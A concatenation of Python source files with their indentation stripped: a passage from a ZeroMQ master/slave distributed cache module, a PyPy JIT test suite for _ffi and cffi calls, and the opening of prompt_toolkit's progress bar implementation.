if(slaveAddress != oldAddress):
oldAddress = slaveAddress
socket = zmq.Context.instance().socket(zmq.PUSH)
socket.connect(slaveAddress)
logger.debug("Change of slave:" + slaveAddress)
socket.send(dumps(Command(SETCOMMAND, objToSend.key, objToSend.value)))
if(settings.isVerbose()):
logger.debug("sended current key to slave: "+str(objToSend.key) +" to " + str(slaveAddress))
sended = True
except Exception as e:
logger.warning("error in slave: " + str(e))
def _setThread(logger, settings, cache, master, url,queue, hostState, timing):
logger.debug("Listening in new task for set on " + url)
context = zmq.Context.instance()
socket = context.socket(zmq.PULL)
socket.set_hwm(1)
socket.bind(url)
internal_channel_added = InternalChannel(addr="127.0.0.1", port=settings.getMemoryObjectPort(), logger=logger)
internal_channel_added.generate_internal_channel_client_side()
internal_channel_restored = InternalChannel(addr="127.0.0.1", port=settings.getIntPort(), logger=logger)
internal_channel_restored.generate_internal_channel_client_side()
transferToDoAfter = False
if master:
timing["setters"] = []
timing["setters"].append(TimingMetricator())
while True:
try:
if master:
timing["setters"][0].startWaiting()
recv = socket.recv()
command = loads(recv)
if(settings.isVerbose()):
logger.debug("received set command: " + str(command))
#logger.debug("received set command: " + str(command))
if command.type == SETCOMMAND:
if(master):
timing["setters"][0].startWorking()
queue.put(Command(command.type, command.key, command.value))
cache.set(command.key, command.value)
if(master):
timing["setters"][0].stopWorking()
elif command.type == SHUTDOWNCOMMAND:
logger.debug("shutdown command")
import os, signal
os.kill(os.getpid(), signal.SIGTERM)
return
elif command.type == TRANSFERMEMORY:
if(master):
timing["setters"][0].setTransferring()
for address in command.address:
logger.debug("Transferring memory to " + str(address) + "....")
dest = address
dataList = cache.cache.iteritems()
begin = command.optional[0]
end = command.optional[1]
_transfer(settings,logger, dest, dataList, begin, end)
logger.debug("Transfer complete!")
elif command.type == NEWMASTER:
if(hostState["current"] == None):
hostState["current"] = command.optional
logger.debug("Configuration of net data: "+ str(hostState["current"]))
else:
hostState["current"] = command.optional
logger.warning("master is dead. Recovering... "+ str(hostState["current"]))
# import keys of master, from this slave memory
thisMasterMemory = "tcp://"+hostState["current"].myself.ip+":"+ str(settings.getMasterSetPort())
thisSlaveMemory = "tcp://"+hostState["current"].myself.ip+":"+ str(settings.getSlaveSetPort())
newSlaveSlaveMemory = "tcp://"+hostState["current"].slave.ip+":"+ str(settings.getSlaveSetPort())
beginFirst = hostState["current"].myself.min_key #command.optional.thisnode.slave.keys.begin oldone!
endFirst = hostState["current"].myself.max_key #command.optional.thisnode.slave.keys.end oldone!
transferRequest(thisSlaveMemory, [thisMasterMemory, newSlaveSlaveMemory], beginFirst, endFirst)
# create new slave memory for this node from new master
newMasterMasterMemory = "tcp://"+ hostState["current"].master.ip +":"+ str(settings.getMasterSetPort())
thisSlaveMemory = "tcp://"+hostState["current"].myself.ip+":"+ str(settings.getSlaveSetPort())
beginSecond = hostState["current"].master.min_key #command.optional.newmaster.master.keys.begin
endSecond = hostState["current"].master.max_key #command.optional.newmaster.master.keys.end
transferRequest(newMasterMasterMemory,[thisSlaveMemory], beginSecond, endSecond)
transferToDoAfter = True
transferType = NEWMASTER
elif command.type == NEWSLAVE:
hostState["current"] = command.optional
logger.debug("Slave is dead, new info: " + str(hostState["current"]))
elif command.type == NEWSTART:
hostState["current"] = command.optional
logger.debug("This is the ip of the vm: \nmaster_of_master {}\n"
"master {}\n"
"myself {}\n"
"slave {}\n"
"slave_of_slave{}".format(hostState["current"].master_of_master.ip,
hostState["current"].master.ip,
hostState["current"].myself.ip,
hostState["current"].slave.ip,
hostState["current"].slave_of_slave.ip))
logger.debug("Memory needs to be configured, first bootup of this memory node, new info: "+ str(hostState["current"].print_elements()))
# import keys of master
thisMasterMemory = "tcp://" + hostState["current"].myself.ip +":"+ str(settings.getMasterSetPort())
thisSlaveMemory = "tcp://" + hostState["current"].myself.ip +":"+ str(settings.getSlaveSetPort())
masterMasterMemory = "tcp://"+hostState["current"].master.ip+":"+ str(settings.getMasterSetPort())
beginFirst = hostState["current"].myself.min_key #command.optional.thisnode.slave.keys.begin oldone!
endFirst = hostState["current"].myself.max_key #command.optional.thisnode.slave.keys.end oldone!
beginSlave = hostState["current"].master.min_key #command.optional.thisnode.slave.keys.begin oldone!
endSlave = hostState["current"].master.max_key #command.optional.thisnode.slave.keys.end oldone!
transferRequest(masterMasterMemory, [thisMasterMemory], beginFirst, endFirst)
transferRequest(masterMasterMemory, [thisSlaveMemory], beginSlave, endSlave)
logger.debug("Waiting for transferring")
transferToDoAfter = True
transferType = NEWSTART
elif command.type == TRANSFERCOMPLETE:
logger.debug("Transfer Complete message received. ToDoAfter: "+str(transferToDoAfter))
if transferToDoAfter and master:
logger.debug("I'm communicating that transfer is completed")
# call the list communication for added or recovered
if transferType == NEWSTART:
internal_channel_added.send_first_internal_channel_message(message=b"FINISHED")
internal_channel_added.wait_int_message(dont_wait=False)
logger.debug("MEMORY TRANSFER finished, notify list thread")
elif transferType == NEWMASTER:
logger.debug("MEMORY TRANSFER finished for new master, notify list thread")
ListThread.notify_memory_request_finished(internal_channel_restored)
#avvertire gestore ciclo che E finito recovery TODO:
logger.warning("new master state recovery: DONE")
#do something with command and hostState
#command.optional --> hostState
logger.debug("Waiting state off")
transferToDoAfter = False
except Exception as e:
logger.error(e)
def _transfer(settings,logger, dest, dataList, begin, end):
logger.debug("Transfer memory command received: Transferring memory to "+ str(dest)+", b,e: "+str(begin)+","+str(end))
context = zmq.Context.instance()
socketTM = context.socket(zmq.PUSH)
socketTM.set_hwm(1)
socketTM.connect(dest)
if(int(begin) <= int(end)):
range1 = (int(begin), int(end))
range2 = (0, 0)
else:
#interval is double, example 11,7. it becomes 11->inf, -inf->7
range1 = (int(begin), float("inf"))
range2 = (-float("inf"), int(end))
def inRange(x,rangey):
x = int(x)
if(x>=rangey[0] and x<=rangey[1]):
return True
else:
return False
try:
for data in dataList:
key = int(data[0])
if(inRange(key, range1) or inRange(key, range2)):
value = data[1].getValue(key)
if(settings.isVerbose()):
logger.debug("transferred: key "+str(key)+",value " + str(value))
socketTM.send(dumps(Command(SETCOMMAND,key,value)))
else:
if(settings.isVerbose()):
key = int(data[0])
value = data[1].getValue(key)
logger.debug("not transferred: key "+str(key)+",value " + str(value))
except Exception:
pass
finally:
socketTM.send(dumps(Command(TRANSFERCOMPLETE)))
logger.debug("Transfer memory command completed: Transferred memory to "+ str(dest))
socketTM.close()
def _getThread(index, logger,settings, cache, master, url, timing):
logger.debug("Listening in new task for get on " + url)
context = zmq.Context.instance()
socket = context.socket(zmq.REP)
socket.connect(url)
if master:
timing["getters"][index] = TimingMetricator()
while True:
try:
if master:
timing["getters"][index].startWaiting()
command = loads(socket.recv())
if master:
timing["getters"][index].startWorking()
if(settings.isVerbose()):
logger.debug("received get command: " + str(command))
#logger.debug( "received get command: " + str(command))
if command.type == GETCOMMAND:
v=cache.get(command.key)
socket.send(dumps(v))
#if command.type == SHUTDOWNCOMMAND:
# return
if master:
timing["getters"][index].stopWorking()
except Exception as e:
logger.error(e)
# client operations
def getRequest(url, key):
context = zmq.Context.instance()
socket = context.socket(zmq.REQ)
socket.connect(url)
socket.send(dumps(Command(GETCOMMAND, key)))
v = loads(socket.recv())
socket.close()
return v
def setRequest(url, key, value):
context = zmq.Context.instance()
socket = context.socket(zmq.PUSH)
socket.set_hwm(1)
socket.connect(url)
socket.send(dumps(Command(SETCOMMAND, key, value)))
socket.close()
def killProcess(url):
context = zmq.Context.instance()
socket = context.socket(zmq.PUSH)
socket.connect(url)
socket.send(dumps(Command(SHUTDOWNCOMMAND)))
socket.close()
def transferRequest(url, dest, begin, end):
context = zmq.Context.instance()
socket = context.socket(zmq.PUSH)
socket.connect(url)
socket.send(dumps(Command(TRANSFERMEMORY, address=dest, optional=(begin,end))))
socket.close()
"""
usage:
from MemoryModule.MemoryManagement import newMasterRequest
import zmq
newMasterRequest("tcp://localhost:" + str(settings.getMasterSetPort()), hostInformations)
"""
def newMasterRequest(url, hostInformations):
context = zmq.Context.instance()
socket = context.socket(zmq.PUSH)
socket.connect(url)
command = Command(NEWMASTER)
command.optional = hostInformations
socket.send(dumps(command))
socket.close()
"""
usage:
from MemoryModule.MemoryManagement import newSlaveRequest
import zmq
newSlaveRequest("tcp://localhost:" + str(settings.getMasterSetPort()), hostInformations)
"""
def newSlaveRequest(url, hostInformations):
context = zmq.Context.instance()
socket = context.socket(zmq.PUSH)
socket.connect(url)
command = Command(NEWSLAVE)
command.optional = hostInformations
socket.send(dumps(command))
socket.close()
"""
usage:
from MemoryModule.MemoryManagement import newStartRequest
import zmq
newStartRequest("tcp://localhost:" + str(settings.getMasterSetPort()), hostInformations)
"""
def newStartRequest(url, hostInformations):
context = zmq.Context.instance()
socket = context.socket(zmq.PUSH)
socket.connect(url)
command = Command(NEWSTART)
command.optional = hostInformations
socket.send(dumps(command))
socket.close()
def standardnewMasterRequest(settings, hostInformations, host="localhost"):
url_setPort = "tcp://"+host+":" + str(settings.getMasterSetPort())
return newMasterRequest(url_setPort, hostInformations)
def standardMasterSetRequest(settings, key, value, host="localhost"):
url_setPort = "tcp://"+host+":" + str(settings.getMasterSetPort())
return setRequest(url_setPort, key, value)
def standardMasterGetRequest(settings, key, host="localhost"):
url_getPort = "tcp://"+host+":" + str(settings.getMasterGetPort())
return getRequest(url_getPort, key)
def standardSlaveSetRequest(settings, key, value, host="localhost"):
url_setPort = "tcp://"+host+":" + str(settings.getSlaveSetPort())
return setRequest(url_setPort, key, value)
def standardSlaveGetRequest(settings, key, host="localhost"):
url_getPort = "tcp://"+host+":" + str(settings.getSlaveGetPort())
return getRequest(url_getPort, key)
def standardKillRequest(settings, host="localhost"):
url_setPort = "tcp://"+host+":" + str(settings.getMasterSetPort())
return killProcess(url_setPort)
def standardTransferRequest(settings, dest="localhost", host="localhost"):
url_setPort = "tcp://"+host+":" + str(settings.getMasterSetPort())
dest = "tcp://"+dest+":" + str(settings.getSlaveSetPort())
return transferRequest(url_setPort, [dest], 0,99999999999999)
class Command(object):
def __init__(self, type, key=None, value=None, address=[], optional=None):
self.type = int(type)
self.key = key
self.value = value
self.address = address
self.optional = optional
def __str__(self):
return "type: "+ str(self.type) + ", key: "+ str(self.key) + ", value: " + str(self.value)
# only for benchamrk
def startMemoryTaskForTrial(preallocatedPool, slabSize, logger, pipe_set, pipe_get):
cache = CacheSlubLRU(preallocatedPool , slabSize, logger) #set as 10 mega, 1 mega per slab
for pipe in pipe_get:
th = Thread(target=_getThread, args=(cache, pipe))
th.start()
_setThread(cache, pipe_set)
class TimingMetricator(object):
"""docstring forTimingMetricator."""
def __init__(self):
self.startWaitingTime = 0
self.startWorkingTime = 0
self.stopWorkingTime = 0
self.meanWaitingRatio = 0
self.totalWorkingTime = 0
self.startPeriod = time()
self.transferring = False
def __str__(self):
return str(self.getMean())
def getMean(self):
return self.meanWaitingRatio
def startWorking(self):
self.startWorkingTime = time()
def startWaiting(self):
self.startWaitingTime = time()
def setTransferring(self):
self.transferring = True
def isTransferring(self):
return self.transferring
def calcMean(self):
period = time() - self.startPeriod
working = self.totalWorkingTime
waitingMean = 1 - (working / float(period))
self.totalWorkingTime = 0
self.startPeriod = time()
self.meanWaitingRatio = waitingMean
self.transferring = False
return waitingMean
def stopWorking(self):
self.stopWorkingTime = time()
work = self.stopWorkingTime - self.startWorkingTime
self.totalWorkingTime += work
|
test_ffi.py
|
import sys, py
from pypy.module.pypyjit.test_pypy_c.test_00_model import BaseTestPyPyC
class Test__ffi(BaseTestPyPyC):
def test__ffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
i = 0
res = 0
while i < 300:
tmp = pow(2, 3) # ID: fficall
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
if 'ConstClass(pow)' in repr(loop): # e.g. OS/X
pow_addr = 'ConstClass(pow)'
assert loop.match_by_id('fficall', """
guard_not_invalidated(descr=...)
i17 = force_token()
setfield_gc(p0, i17, descr=<.* .*PyFrame.vable_token .*>)
f21 = call_release_gil(%s, 2.000000, 3.000000, descr=<Callf 8 ff EF=7>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""" % pow_addr)
def test__ffi_call_frame_does_not_escape(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
def mypow(a, b):
return pow(a, b)
i = 0
res = 0
while i < 300:
tmp = mypow(2, 3)
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
opnames = log.opnames(loop.allops())
# we only force the virtualref, not its content
assert opnames.count('new_with_vtable') == 1
def test__ffi_call_releases_gil(self):
from rpython.rlib.clibffi import get_libc_name
def main(libc_name, n):
import time
import os
from threading import Thread
#
if os.name == 'nt':
from _rawffi.alt import WinDLL, types
libc = WinDLL('Kernel32.dll')
sleep = libc.getfunc('Sleep', [types.uint], types.uint)
delays = [0]*n + [1000]
else:
from _rawffi.alt import CDLL, types
libc = CDLL(libc_name)
sleep = libc.getfunc('sleep', [types.uint], types.uint)
delays = [0]*n + [1]
#
def loop_of_sleeps(i, delays):
for delay in delays:
sleep(delay) # ID: sleep
#
threads = [Thread(target=loop_of_sleeps, args=[i, delays]) for i in range(5)]
start = time.time()
for i, thread in enumerate(threads):
thread.start()
for thread in threads:
thread.join()
end = time.time()
return end - start
log = self.run(main, [get_libc_name(), 200], threshold=150,
import_site=True)
assert 1 <= log.result <= 1.5 # at most 0.5 seconds of overhead
loops = log.loops_by_id('sleep')
assert len(loops) == 1 # make sure that we actually JITted the loop
def test__ffi_struct(self):
def main():
from _rawffi.alt import _StructDescr, Field, types
fields = [
Field('x', types.slong),
]
descr = _StructDescr('foo', fields)
struct = descr.allocate()
i = 0
while i < 300:
x = struct.getfield('x') # ID: getfield
x = x+1
struct.setfield('x', x) # ID: setfield
i += 1
return struct.getfield('x')
#
log = self.run(main, [])
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('getfield', """
guard_not_invalidated(descr=...)
i57 = getfield_raw_i(i46, descr=<FieldS dynamic 0>)
""")
assert loop.match_by_id('setfield', """
setfield_raw(i44, i57, descr=<FieldS dynamic 0>)
""")
def test__cffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BInt = _cffi_backend.new_primitive_type("int")
BPow = _cffi_backend.new_function_type([BDouble, BInt], BDouble)
ldexp = libm.load_function(BPow, 'ldexp')
i = 0
res = 0
while i < 300:
tmp = ldexp(1, 3) # ID: cfficall
res += tmp
i += 1
BLong = _cffi_backend.new_primitive_type("long")
ldexp_addr = int(_cffi_backend.cast(BLong, ldexp))
return ldexp_addr, res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
ldexp_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
f97 = call_release_gil_f(91, i59, 1.0, 3, descr=<Callf 8 fi EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test__cffi_call_c_int(self):
if sys.platform == 'win32':
py.test.skip("not tested on Windows (this test must pass on "
"other platforms, and it should work the same way)")
def main():
import os
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libc = _cffi_backend.load_library(None)
BInt = _cffi_backend.new_primitive_type("int")
BClose = _cffi_backend.new_function_type([BInt], BInt)
_dup = libc.load_function(BClose, 'dup')
i = 0
fd0, fd1 = os.pipe()
while i < 300:
tmp = _dup(fd0) # ID: cfficall
os.close(tmp)
i += 1
os.close(fd0)
os.close(fd1)
BLong = _cffi_backend.new_primitive_type("long")
return 42
#
log = self.run(main, [])
assert log.result == 42
loop, = log.loops_by_filename(self.filepath)
if sys.maxint > 2**32:
extra = "i98 = int_signext(i97, 4)"
else:
extra = ""
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
i97 = call_release_gil_i(91, i59, i50, descr=<Calli 4 i EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
%s
""" % extra, ignore_ops=['guard_not_invalidated'])
def test__cffi_call_size_t(self):
if sys.platform == 'win32':
py.test.skip("not tested on Windows (this test must pass on "
"other platforms, and it should work the same way)")
def main():
import os
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libc = _cffi_backend.load_library(None)
BInt = _cffi_backend.new_primitive_type("int")
BSizeT = _cffi_backend.new_primitive_type("size_t")
BChar = _cffi_backend.new_primitive_type("char")
BCharP = _cffi_backend.new_pointer_type(BChar)
BWrite = _cffi_backend.new_function_type([BInt, BCharP, BSizeT],
BSizeT) # not signed here!
_write = libc.load_function(BWrite, 'write')
i = 0
fd0, fd1 = os.pipe()
buffer = _cffi_backend.newp(BCharP, b'A')
while i < 300:
tmp = _write(fd1, buffer, 1) # ID: cfficall
assert tmp == 1
assert os.read(fd0, 2) == b'A'
i += 1
os.close(fd0)
os.close(fd1)
return 42
#
log = self.run(main, [])
assert log.result == 42
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
i97 = call_release_gil_i(91, i59, i10, i12, 1, descr=<Calli . iii EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
p98 = call_r(ConstClass(fromrarith_int__r_uint), i97, descr=<Callr . i EF=4>)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test_cffi_call_guard_not_forced_fails(self):
# this is the test_pypy_c equivalent of
# rpython/jit/metainterp/test/test_fficall::test_guard_not_forced_fails
#
# it requires cffi to be installed for pypy in order to run
def main():
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
typedef void (*functype)(int);
int foo(int n, functype func);
""")
lib = ffi.verify("""
#include <signal.h>
typedef void (*functype)(int);
int foo(int n, functype func) {
if (n >= 2000) {
func(n);
}
return n*2;
}
""")
@ffi.callback("functype")
def mycallback(n):
if n < 5000:
return
# make sure that guard_not_forced fails
d = {}
f = sys._getframe()
while f:
d.update(f.f_locals)
f = f.f_back
n = 0
while n < 10000:
res = lib.foo(n, mycallback) # ID: cfficall
# this is the real point of the test: before the
# refactor-call_release_gil branch, the assert failed when
# res == 5000
assert res == n*2
n += 1
return n
log = self.run(main, [], import_site=True,
discard_stdout_before_last_line=True) # <- for Win32
assert log.result == 10000
loop, = log.loops_by_id('cfficall')
assert loop.match_by_id('cfficall', """
...
i1 = call_release_gil_i(..., descr=<Calli 4 ii EF=7 OS=62>)
...
""")
def test__cffi_bug1(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BSin = _cffi_backend.new_function_type([BDouble], BDouble)
sin = libm.load_function(BSin, 'sin')
def f(*args):
for i in range(300):
sin(*args)
f(1.0)
f(1)
#
libm_name = get_libm_name(sys.platform)
self.run(main, [libm_name])
# assert did not crash
def test_cffi_init_struct_with_list(self):
def main(n):
import sys
try:
import cffi
except ImportError:
sys.stderr.write('SKIP: cannot import cffi\n')
return 0
ffi = cffi.FFI()
ffi.cdef("""
struct s {
short x;
short y;
short z;
};
""")
for i in range(n):
ffi.new("struct s *", [i, i, i])
log = self.run(main, [300])
loop, = log.loops_by_filename(self.filepath)
assert loop.match("""
i106 = getfield_gc_i(p20, descr=...)
i161 = int_lt(i106, i43)
guard_true(i161, descr=...)
i162 = int_add(i106, 1)
p110 = getfield_gc_r(p16, descr=...)
setfield_gc(p20, i162, descr=...)
guard_value(p110, ConstPtr(ptr111), descr=...)
guard_not_invalidated(descr=...)
p163 = force_token()
p164 = force_token()
p118 = getfield_gc_r(p16, descr=...)
p120 = getarrayitem_gc_r(p118, 0, descr=...)
guard_value(p120, ConstPtr(ptr121), descr=...)
p122 = getfield_gc_r(p120, descr=...)
guard_value(p122, ConstPtr(ptr123), descr=...)
p125 = getfield_gc_r(p16, descr=...)
guard_nonnull_class(p125, ..., descr=...)
p127 = getfield_gc_r(p125, descr=...)
guard_value(p127, ConstPtr(ptr128), descr=...)
p129 = getfield_gc_r(p127, descr=...)
guard_value(p129, ConstPtr(ptr130), descr=...)
p132 = call_r(ConstClass(_ll_0_alloc_with_del___), descr=...)
guard_no_exception(descr=...)
p133 = force_token()
p134 = new_with_vtable(descr=...)
setfield_gc(p134, ..., descr=...)
setfield_gc(p134, ConstPtr(null), descr=...)
setfield_gc(p48, p134, descr=...)
setfield_gc(p132, ..., descr=...)
i138 = call_i(ConstClass(_ll_1_raw_malloc_varsize_zero__Signed), 6, descr=...)
check_memory_error(i138)
setfield_gc(p132, i138, descr=...)
setfield_gc(p132, 0, descr=...)
setfield_gc(p132, ConstPtr(ptr139), descr=...)
setfield_gc(p132, -1, descr=...)
setfield_gc(p0, p133, descr=...)
call_may_force_n(ConstClass(_ll_2_gc_add_memory_pressure__Signed_pypy_module__cffi_backend_cdataobj_W_CDataNewStdPtr), 6, p132, descr=...)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
i144 = int_add(i138, 0)
i146 = int_signext(i106, 2)
i147 = int_ne(i106, i146)
guard_false(i147, descr=...)
setarrayitem_raw(i144, 0, i106, descr=...)
i150 = int_add(i138, 2)
setarrayitem_raw(i150, 0, i106, descr=...)
i153 = int_add(i138, 4)
setarrayitem_raw(i153, 0, i106, descr=...)
p156 = getfield_gc_r(p48, descr=...)
i158 = getfield_raw_i(..., descr=...)
setfield_gc(p48, p49, descr=...)
setfield_gc(p134, ConstPtr(null), descr=...)
i160 = int_lt(i158, 0)
guard_false(i160, descr=...)
jump(..., descr=...)
""")
|
base.py
|
"""
Progress bar implementation on top of prompt_toolkit.
::
with ProgressBar(...) as pb:
for item in pb(data):
...
"""
import datetime
import functools
import os
import signal
import sys
import threading
import traceback
from asyncio import (
CancelledError,
get_event_loop,
new_event_loop,
set_event_loop,
sleep,
)
from typing import (
Generator,
Generic,
Iterable,
List,
Optional,
Sequence,
Sized,
TextIO,
TypeVar,
cast,
)
from prompt_toolkit.application import Application
from prompt_toolkit.application.current import get_app_session
from prompt_toolkit.filters import Condition, is_done, renderer_height_is_known
from prompt_toolkit.formatted_text import (
AnyFormattedText,
StyleAndTextTuples,
to_formatted_text,
)
from prompt_toolkit.input import Input
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.key_binding.key_processor import KeyPressEvent
from prompt_toolkit.layout import (
ConditionalContainer,
FormattedTextControl,
HSplit,
Layout,
VSplit,
Window,
)
from prompt_toolkit.layout.controls import UIContent, UIControl
from prompt_toolkit.layout.dimension import AnyDimension, D
from prompt_toolkit.output import ColorDepth, Output, create_output
from prompt_toolkit.styles import BaseStyle
from prompt_toolkit.utils import in_main_thread
from .formatters import Formatter, create_default_formatters
try:
import contextvars
except ImportError:
from prompt_toolkit.eventloop import dummy_contextvars as contextvars # type: ignore
__all__ = [
'ProgressBar',
]
E = KeyPressEvent
def create_key_bindings() -> KeyBindings:
"""
Key bindings handled by the progress bar.
(The main thread is not supposed to handle any key bindings.)
"""
kb = KeyBindings()
@kb.add('c-l')
def _(event: E) -> None:
event.app.renderer.clear()
@kb.add('c-c')
def _(event: E) -> None:
# Send KeyboardInterrupt to the main thread.
os.kill(os.getpid(), signal.SIGINT)
return kb
_T = TypeVar('_T')
class ProgressBar:
"""
Progress bar context manager.
Usage ::
with ProgressBar(...) as pb:
for item in pb(data):
...
:param title: Text to be displayed above the progress bars. This can be a
callable or formatted text as well.
:param formatters: List of :class:`.Formatter` instances.
:param bottom_toolbar: Text to be displayed in the bottom toolbar. This
can be a callable or formatted text.
:param style: :class:`prompt_toolkit.styles.BaseStyle` instance.
:param key_bindings: :class:`.KeyBindings` instance.
:param file: The file object used for rendering, by default `sys.stderr` is used.
:param color_depth: `prompt_toolkit` `ColorDepth` instance.
:param output: :class:`~prompt_toolkit.output.Output` instance.
:param input: :class:`~prompt_toolkit.input.Input` instance.
"""
def __init__(self,
title: AnyFormattedText = None,
formatters: Optional[Sequence[Formatter]] = None,
bottom_toolbar: AnyFormattedText = None,
style: Optional[BaseStyle] = None,
key_bindings: Optional[KeyBindings] = None,
file: Optional[TextIO] = None,
color_depth: Optional[ColorDepth] = None,
output: Optional[Output] = None,
input: Optional[Input] = None) -> None:
self.title = title
self.formatters = formatters or create_default_formatters()
self.bottom_toolbar = bottom_toolbar
self.counters: List[ProgressBarCounter[object]] = []
self.style = style
self.key_bindings = key_bindings
# Note that we use __stderr__ as default error output, because that
# works best with `patch_stdout`.
self.color_depth = color_depth
self.output = output or get_app_session().output
self.input = input or get_app_session().input
self._thread: Optional[threading.Thread] = None
self._loop = get_event_loop()
self._app_loop = new_event_loop()
self._previous_winch_handler = signal.getsignal(signal.SIGWINCH)
self._has_sigwinch = False
def __enter__(self) -> 'ProgressBar':
# Create UI Application.
title_toolbar = ConditionalContainer(
Window(FormattedTextControl(lambda: self.title), height=1, style='class:progressbar,title'),
filter=Condition(lambda: self.title is not None))
bottom_toolbar = ConditionalContainer(
Window(FormattedTextControl(lambda: self.bottom_toolbar,
style='class:bottom-toolbar.text'),
style='class:bottom-toolbar',
height=1),
filter=~is_done & renderer_height_is_known &
Condition(lambda: self.bottom_toolbar is not None))
def width_for_formatter(formatter: Formatter) -> AnyDimension:
# Needs to be passed as callable (partial) to the 'width'
# parameter, because we want to call it on every resize.
return formatter.get_width(progress_bar=self)
progress_controls = [
Window(
content=_ProgressControl(self, f),
width=functools.partial(width_for_formatter, f))
for f in self.formatters
]
self.app: Application[None] = Application(
min_redraw_interval=.05,
layout=Layout(HSplit([
title_toolbar,
VSplit(progress_controls,
height=lambda: D(
preferred=len(self.counters),
max=len(self.counters))),
Window(),
bottom_toolbar,
])),
style=self.style,
key_bindings=self.key_bindings,
refresh_interval=.3,
color_depth=self.color_depth,
output=self.output,
input=self.input)
# Run application in different thread.
def run() -> None:
set_event_loop(self._app_loop)
try:
self.app.run()
except BaseException as e:
traceback.print_exc()
print(e)
ctx: contextvars.Context = contextvars.copy_context()
self._thread = threading.Thread(target=ctx.run, args=(run, ))
self._thread.start()
# Attach WINCH signal handler in main thread.
# (Interrupt that we receive during resize events.)
self._has_sigwinch = hasattr(signal, 'SIGWINCH') and in_main_thread()
if self._has_sigwinch:
self._previous_winch_handler = signal.getsignal(signal.SIGWINCH)
self._loop.add_signal_handler(signal.SIGWINCH, self.invalidate)
return self
def __exit__(self, *a: object) -> None:
# Quit UI application.
if self.app.is_running:
self.app.exit()
# Remove WINCH handler.
if self._has_sigwinch:
self._loop.remove_signal_handler(signal.SIGWINCH)
signal.signal(signal.SIGWINCH, self._previous_winch_handler)
if self._thread is not None:
self._thread.join()
self._app_loop.close()
def __call__(self,
data: Optional[Iterable[_T]] = None,
label: AnyFormattedText = '',
remove_when_done: bool = False,
total: Optional[int] = None) -> 'ProgressBarCounter[_T]':
"""
Start a new counter.
:param label: Title text or description for this progress. (This can be
formatted text as well).
:param remove_when_done: When `True`, hide this progress bar.
:param total: Specify the maximum value if it can't be calculated by
calling ``len``.
"""
counter = ProgressBarCounter(
self, data, label=label, remove_when_done=remove_when_done, total=total)
self.counters.append(counter)
return counter
def invalidate(self) -> None:
self._app_loop.call_soon_threadsafe(self.app.invalidate)
class _ProgressControl(UIControl):
"""
User control for the progress bar.
"""
def __init__(self, progress_bar: ProgressBar, formatter: Formatter) -> None:
self.progress_bar = progress_bar
self.formatter = formatter
self._key_bindings = create_key_bindings()
def create_content(self, width: int, height: int) -> UIContent:
items: List[StyleAndTextTuples] = []
for pr in self.progress_bar.counters:
try:
text = self.formatter.format(self.progress_bar, pr, width)
except BaseException:
traceback.print_exc()
text = 'ERROR'
items.append(to_formatted_text(text))
def get_line(i: int) -> StyleAndTextTuples:
return items[i]
return UIContent(
get_line=get_line,
line_count=len(items),
show_cursor=False)
def is_focusable(self) -> bool:
return True # Make sure that the key bindings work.
def get_key_bindings(self) -> KeyBindings:
return self._key_bindings
_CounterItem = TypeVar('_CounterItem', covariant=True)
class ProgressBarCounter(Generic[_CounterItem]):
"""
An individual counter (A progress bar can have multiple counters).
"""
def __init__(self, progress_bar: ProgressBar,
data: Optional[Iterable[_CounterItem]] = None,
label: AnyFormattedText = '',
remove_when_done: bool = False,
total: Optional[int] = None) -> None:
self.start_time = datetime.datetime.now()
self.progress_bar = progress_bar
